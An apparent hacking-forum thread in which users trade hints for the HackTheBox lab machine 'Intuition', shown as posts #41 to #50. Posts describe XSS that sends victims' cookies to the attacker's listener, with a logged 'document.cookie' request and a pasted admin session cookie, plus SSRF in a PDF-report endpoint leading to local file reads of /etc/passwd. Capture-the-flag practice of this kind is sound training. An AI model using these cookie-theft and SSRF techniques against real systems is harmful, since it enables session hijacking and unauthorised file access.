HTB- Intuition
by trevor69000 - Saturday April 27, 2024 at 06:46 PM
#41
After the XSS part. Clearly there is an SSRF in /create_pdf_report. It will download file from our url and create a PDF.

Anyone found something how to leverage this? It looks like a wkhtmltopdf vuln related to the recent web challenge I found an article https://4xura.com/ctf/htb/htb-writeup-web-pdfy/
Reply
#42
can they please fix this stupid box. so frustrating.
Reply
#43
(Apr 28, 2024, 05:53 AM)mycatdante Wrote: After the XSS part. Clearly there is an SSRF in /create_pdf_report. It will download file from our url and create a PDF.

Anyone found something how to leverage this? It looks like a wkhtmltopdf vuln related to the recent web challenge I found an article https://4xura.com/ctf/htb/htb-writeup-web-pdfy/

how can you get 2nd user cookie?
Reply
#44
(Apr 28, 2024, 06:04 AM)meoami Wrote:
(Apr 28, 2024, 05:53 AM)mycatdante Wrote: After the XSS part. Clearly there is an SSRF in /create_pdf_report. It will download file from our url and create a PDF.

Anyone found something how to leverage this? It looks like a wkhtmltopdf vuln related to the recent web challenge I found an article https://4xura.com/ctf/htb/htb-writeup-web-pdfy/

how can you get 2nd user cookie?

I am working on it. Good news is that I tried the way the article introduce:

I make an index.html with <ifram> tag. Put our IP inside the tag and the server request 2nd time and I think it's the ssrf. Still figuring out how to get the 2nd cookie or other thing. 

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.177.46 - - [28/Apr/2024 02:06:49] "GET / HTTP/1.1" 200 -      <- 1st request
10.129.177.46 - - [28/Apr/2024 02:06:51] "GET /?cookie=+document.cookie HTTP/1.1" 200 -     <- 2nd request SSRF
Reply
#45
If anyone stuck on this xss
admin cookie eyJ1c2VyX2lkIjogNiwgInVzZXJuYW1lIjogIjEyMzQiLCAicm9sZSI6ICJ1c2VyIn18NTQ5ZGU5NjRjY2NlOGE4NDI4ZTA0ZGMwNzU2ZGE4YmI5NzA1ODlkOTEzYjI0Y2Y5OGZlYTliNzM3Y2E3ZjY5NA==
try it if it works move on to http://dashboard.comprezzor.htb/create_pdf_report
Reply
#46
anything for root?
Reply
#47
(Apr 28, 2024, 06:04 AM)meoami Wrote:
(Apr 28, 2024, 05:53 AM)mycatdante Wrote: After the XSS part. Clearly there is an SSRF in /create_pdf_report. It will download file from our url and create a PDF.

Anyone found something how to leverage this? It looks like a wkhtmltopdf vuln related to the recent web challenge I found an article https://4xura.com/ctf/htb/htb-writeup-web-pdfy/

how can you get 2nd user cookie?
when you get first webdav user 
again
POST  report with some text and payload <img....>
then on dashboard set priority to this new report to high Smile
Reply
#48
hmm , i just run
nc -nvlp 80
and provide url to my server as param then i found cookie send as header

Listening on 0.0.0.0 80
Connection received on 10.10.11.15 44208
GET / HTTP/1.1
Accept-Encoding: identity
Host: 10.10.15.3
User-Agent: Python-urllib/3.11
Cookie: user_data=eyJ1c2VyX2lkIjo
Connection: close

i use it to access the dashboard , this cookie is for admin
then i found LFI by ssrf identified by cve-2023–24329 i tried this because of user-agent header and now we have lfi
i download /etc/passwd as pdf and i check his content and metadata and i found it generated by wkhtmltopdf 0.12.6

any hint for get a shell ?
Reply
#49
Intuition writeup

https://hackthesquare.mysellix.io/produc...on-writeup

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Selling in HTB
Reply
#50
(Apr 28, 2024, 07:34 AM)andlommy Wrote: user, finally
use the SSRF to find application code
use that same ssrf to access the next hop (http is not the only protocol Wink
convert key
profit.

now for the root....

How do you know the location of the source code?
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 602 91,774 8 hours ago
Last Post: sabero_exe
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,968 Yesterday, 09:54 AM
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,937 Yesterday, 08:48 AM
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,627 Yesterday, 05:08 AM
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,275 Apr 30, 2026, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)